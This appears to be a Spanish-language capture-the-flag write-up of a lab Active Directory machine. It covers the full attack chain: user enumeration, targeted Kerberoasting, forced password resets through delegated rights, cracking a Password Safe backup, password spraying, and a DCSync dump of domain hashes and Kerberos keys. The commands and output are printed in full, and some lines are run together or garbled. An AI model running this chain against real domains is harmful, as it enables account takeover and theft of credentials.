1$ sudo nmap -p--sCV -sS --min-rate 5000-Pn -n --disable-arp-ping 10.129.136.29-oN nmap/scan -vv​
2PORTSTATESERVICEVERSION21/tcp open ftp Microsoft ftpd| ftp-syst:|_ SYST: Windows_NT53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:2024-11-1112:30:54Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP(Domain: administrator.htb0.,Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP(Domain: administrator.htb0.,Site: Default-First-Site-Name)3269/tcp open tcpwrapped5985/tcp open http Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcp open mc-nmf .NET Message Framing47001/tcp open http Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49664/tcp open msrpc Microsoft Windows RPC49665/tcp open msrpc Microsoft Windows RPC49666/tcp open msrpc Microsoft Windows RPC49667/tcp open msrpc Microsoft Windows RPC49668/tcp open msrpc Microsoft Windows RPC54058/tcp open ncacn_http Microsoft Windows RPC over HTTP1.054063/tcp open msrpc Microsoft Windows RPC54074/tcp open msrpc Microsoft Windows RPC54085/tcp open msrpc Microsoft Windows RPC54121/tcp open msrpc Microsoft Windows RPC62321/tcp open msrpc Microsoft Windows RPCService Info: Host:DC;OS: Windows;CPE: cpe:/o:microsoft:windows​Host script results:| smb2-security-mode:|3:1:1:|_ Message signing enabled and required|_clock-skew: 7h00m02s| smb2-time: | date: 2024-11-11T12:31:56|_ start_date: N/A

rpcclient

1rpcclient -U'Olivia'%'ichliebedich'10.129.251.119-c enumdomusers | cut -d [-f 2| cut -d ]-f 1> user_rpcclient.txt​AdministratorGuestkrbtgtoliviamichaelbenjaminemilyethanalexanderemma

nxc

1❯ nxc smb 10.129.251.119 -u 'Olivia' -p 'ichliebedich' --shares
2
3SMB 10.129.251.119 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.129.251.119 445 DC [+] administrator.htb\Olivia:ichliebedich SMB 10.129.251.119 445 DC [*] Enumerated sharesSMB 10.129.251.119 445 DC Share Permissions RemarkSMB 10.129.251.119 445 DC ----- ----------- ------SMB 10.129.251.119 445 DC ADMIN$ Remote AdminSMB 10.129.251.119 445 DC C$ Default shareSMB 10.129.251.119 445 DC IPC$ READ Remote IPCSMB 10.129.251.119 445 DC NETLOGON READ Logon server share SMB 10.129.251.119 445 DC SYSVOL READ Logon server share

No se encuentra ningún tipo de archivos interesantes.

kerberos attack

1[!] Kerberos SessionError:KRB_AP_ERR_SKEW(Clock skew too great)
2
3❯ sudo service virtualbox-guest-utils stop && sudo ntpdate 10.129.251.119❯ python3 targetedKerberoast.py -u Olivia -p ichliebedich --dc-ip 10.129.251.119-d administrator.htb

Cuando realizamos el comando necesitamos sincronizar el tiempo de nuestra máquina con el domain controller. Luego lanzamos para obtener el hash de michael, pero no se puede crackear.

Evil-WinRM

Intentamos conectar por Evil-WinRM:

1[~/htb/administrator]└─$ evil-winrm -i 10.10.11.42-u OliviaEnter Password:
2PSC:\Users\olivia\Documents>

No encontramos nada, solo algunas ayudas con el sharpbound instalado y el nc64 que es una manera de hacer una conexión remota, cuando lo ejecutamos nos pide parámetros de conexión.

Bloodhound

1❯ bloodhound-python -u 'Olivia'-p 'ichliebedich'-d administrator.htb -c all --zip -ns 10.129.2

USER

Michael

1❯ bloodyAD --host 10.129.251.119 -d administrator.htb -u olivia -p ichliebedich set password michael Cybersen123@

Después de tener al usuario michael podemos volver a tener que lanzar el bloodhound.

1❯ bloodhound-python -u 'michael' -p 'Cybersen123@' -d administrator.htb -c all --zip -ns 10.129.251.119

Vemos que tenemos permisos para cambiar de password a Benjamin.

Benjamin

1❯ bloodyAD --host 10.129.251.119 -d administrator.htb -u michael -p 'Cybersen123@' set password Benjamin Cybersen123@

Así podemos entrar a Benjamin, si deseamos podemos seguir haciendo bloodhound, pero en estos casos vamos a tener que enumerar un recurso compartido en ftp como pudimos ver en la etapa de reconocimento.

Emily

1$ nxc ftp administrator.htb -u 'benjamin' -p 'Cybersen123@' --ls
2$ nxc ftp administrator.htb -u 'benjamin' -p 'Cybersen123@' --get Backup.psafe3

Si le hacemos un file podemos darnos cuenta que efectivamente no es ningun archivo ofuscado entonces procedemos a hashear.

1❯ pwsafe2john Backup.psafe3Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
2
3❯ john --list=formats | grep pwsafepwsafe, qnx,RACF,RACF-KDFAES, radius, RAdmin,RAKP, rar,RAR5, Raw-SHA512,
4
5❯ john --format=pwsafe --wordlist=/usr/share/wordlists/rockyou.txt hash_backuppsafe3.txt...tekieromucho (Backu)

Instalar pwsafe3 en la máquina windows e ingresar la contraseña.Hacer password spraying:

1 nxc smb 10.129.251.119-u user_rpcclient.txt -p passwords --continue-on-success​SMB10.129.251.119445DC[+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

ROOT

Ethan

Aprovechamos los permisos GenericWritede emily para hacer un targetedKerberos.❯ python3 targetedKerberoast.py -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.164.9 -d administrator.htbHasheamos:❯ hashcat -m 131DYsinc AttackAprovechando el poder o autorización DYsinc para poder obtener los hashes como si fueramos adminsitrador.

1└─$ python3 secretsdump.py administrator.htb/ethan:limpbizkit@10.10.11.42Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ​[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:986ced7b028e25984c4e2ad171d9ded5:::administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2Administrator:des-cbc-md5:403286f7cdf18385krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94​[*] Cleaning up... ​

GG!